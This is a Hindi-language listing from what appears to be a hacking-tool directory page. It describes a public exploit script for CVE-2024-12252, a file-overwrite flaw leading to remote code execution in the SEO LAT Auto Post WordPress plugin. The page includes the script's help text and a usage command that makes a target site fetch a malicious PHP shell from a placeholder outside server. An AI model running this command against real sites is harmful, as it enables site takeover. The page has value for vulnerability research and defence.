Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-12252 — SEO LAT Auto Post <= 2.2.1 - फ़ाइल ओवरराइट/अपलोड के लिए अनधिकृत पहुंच (रिमोट कोड निष्पादन) | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-12252
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubnxploited/cve-2024-12252

CVE-2024-12252

SEO LAT Auto Post <= 2.2.1 - फ़ाइल ओवरराइट/अपलोड के लिए अनधिकृत पहुंच (रिमोट कोड निष्पादन)

रिपॉजिटरी देखें
161 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SEO LAT Auto Post <= 2.2.1 - रिमोट कोड निष्पादन (Remote Code Execution)

विवरण

WordPress के लिए SEO LAT Auto Post प्लगइन में, remote_update AJAX कार्रवाई में एक लापता क्षमता जांच के कारण, सभी संस्करणों (2.2.1 तक और इसमें शामिल) में फ़ाइल ओवरराइट करने की संभावना है। यह अप्रमाणित हमलावरों के लिए seo-beginner-auto-post.php फ़ाइल को ओवरराइट करना संभव बनाता है, जिसका उपयोग रिमोट कोड निष्पादन प्राप्त करने के लिए किया जा सकता है।

कमजोरी का विवरण

  • CVE: CVE-2024-12252
  • CVSS स्कोर: 9.8 (गंभीर)

शोषण (Exploitation)

यह स्क्रिप्ट SEO LAT Auto Post प्लगइन में कमजोरी का शोषण करती है, seo-beginner-auto-post.php फ़ाइल को ओवरराइट करके रिमोट कोड निष्पादन प्राप्त करने के लिए। स्क्रिप्ट प्लगइन संस्करण की जाँच करने, शोषण को ट्रिगर करने और कमांड निष्पादित करने के लिए एक इंटरैक्टिव शेल प्रदान करने की प्रक्रिया को स्वचालित करती है।

उपयोग

usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL

CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi

options:
-h, --help            show this help message and exit
-u, --url URL         Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
                      Direct URL to your malicious PHP shell

लक्ष्य URL और अपने दुर्भावनापूर्ण PHP शेल के URL के साथ स्क्रिप्ट चलाएँ:

python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php

संदर्भ

  • Wordfence Intelligence
  • CVE-2024-12252
टूल डाउनलोड करें